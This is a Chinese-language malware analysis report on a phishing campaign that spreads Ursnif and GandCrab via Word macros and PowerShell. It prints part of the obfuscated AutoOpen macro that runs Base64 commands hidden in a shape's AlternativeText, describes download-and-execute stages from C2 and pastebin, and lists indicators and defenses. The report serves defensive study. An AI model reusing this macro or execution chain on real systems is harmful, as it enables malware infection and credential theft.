传播GandCrab和Ursnif的攻击活动分析
字数 1756 2025-08-06 08:35:14
GandCrab和Ursnif攻击活动技术分析报告
1. 攻击活动概述
Carbon Black ThreatSight团队发现一起复杂的攻击活动,成功后可同时感染Ursnif恶意软件和GandCrab勒索软件。攻击者使用了多种红队技术和网络犯罪常用手法。
攻击链流程:
- 钓鱼邮件携带恶意Word文档
- 文档中的恶意宏执行编码的PowerShell脚本
- PowerShell下载并执行Ursnif和GandCrab变种
2. 初始感染载体分析
2.1 恶意Word文档特征
- 格式:.doc格式Word文档
- 样本数量:约180个变种
- 变种差异:主要在于恶意宏中的metadata和junk data
- 文档元数据:
- 最早保存日期:2018年12月17日
- 最近更新日期:2019年1月21日
- Subject字段:使用美国州名和常见姓名
2.2 恶意宏分析
- 宏类型:VBS宏
- 代码特征:
- 总行数约650行
- 大部分为垃圾代码
- 核心功能代码约18行
核心代码功能:
Sub AutoOpen()
Set QWxwqfqgHttm = ThisDocument
Set FXpVcBPxzVsJ = QWxwqfqgHttm.Shapes("4obka2etp1318a")
faaQXNtRqmxB = FXpVcBPxzVsJ.AlternativeText
npNsCwDavJ = Array(HpTNHpSpmZgp, BlmmaRvZMLP, tRzpZFwJWJcCj, tPJRanNbKWZPrd,Interaction@.Shell(CleanString(faaQXNtRqmxB), 231 * 2 + -462), RfjXGpzMtcrz, hfbZCRXCJQPJQ)
- 攻击手法:
- 从文档特定Shape中提取AlternativeText内容
- AlternativeText中包含Base64编码的命令
- 解码并执行这些命令
3. PowerShell攻击阶段分析
3.1 第一阶段PowerShell脚本
- 创建.Net Webclient类实例
- 使用GetMethods()枚举可用方法
- 关键方法调用:
- DownloadString方法:
- 联系硬编码C2服务器下载文件
- 在内存中执行下载的字符串内容
- DownloadData方法:
- 从第二个C2下载资源
- 保存位置:C:\ProgramData
- 使用硬编码文件名
- 使用DCOM对象CLSID(C08AFD90-F2A1-11D1-8455-00A0C91F3880)实例化ShellBrowserWindow对象
- 调用ShellExecute方法执行
- DownloadString方法:
3.2 GandCrab下载执行流程
-
通过DownloadString下载的payload:
- 单行PowerShell脚本
- 评估系统架构(x86/x64)
- 从pastebin.com下载额外payload
- 内存中执行
-
Pastebin下载内容:
- 约2800行PowerShell脚本
- 基于Empire Invoke-PSInject模块修改
- 修改内容:
- 移除注释
- 重命名变量
- 功能:将base64编码的PE文件注入当前PowerShell进程
-
GandCrab样本特征:
- 版本:5.0.4
- 文件信息:
File Name: krab5 File Size: 133,632 bytes MD5: 0f270db9ab9361e20058b8c6129bf30e SHA256: d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 Compiled Time: Mon Oct 29 17:39:23 2018 UTC PE Sections: .text, .rdata, .data, .rsrc, .reloc Original DLL: krab5.dll
3.3 Ursnif下载执行流程
- 通过DownloadData方法下载
- 保存位置:C:\ProgramData\随机文件名
- 功能:
- 凭证窃取
- 系统和进程信息收集
- 其他Ursnif典型行为
- 样本分布:
- bevendbrec.com站点
- iscondisth.com站点
- 共发现约200个不同变种
4. 攻击基础设施分析
4.1 C2服务器
- 主要域名:
- bevendbrec[.]com
- iscondisth[.]com
4.2 样本关联分析
- 使用VirusTotal Graph功能对180个变种进行分类
- 分类依据:
- 元数据
- 文档结构
- C2基础设施
5. 防御建议
5.1 检测指标
- 文档中可疑的Shape对象和AlternativeText属性
- 调用ShellBrowserWindow CLSID(C08AFD90-F2A1-11D1-8455-00A0C91F3880)的行为
- 从pastebin.com下载并执行PowerShell脚本的行为
- 以下目录的可疑文件创建:
- C:\ProgramData\
5.2 防护措施
-
宏安全:
- 禁用Office文档中的宏执行
- 对必须使用宏的场景实施严格审核
-
PowerShell防护:
- 启用PowerShell脚本块日志记录
- 限制PowerShell的下载和执行能力
-
网络防护:
- 阻止对pastebin.com等文本共享站点的企业访问
- 监控对已知恶意域名的访问(bevendbrec.com, iscondisth.com)
-
端点防护:
- 部署能够检测反射型DLL注入的行为检测方案
- 监控内存中的可疑PE加载行为
-
用户教育:
- 培训用户识别钓鱼邮件特征
- 强调不要启用可疑文档中的宏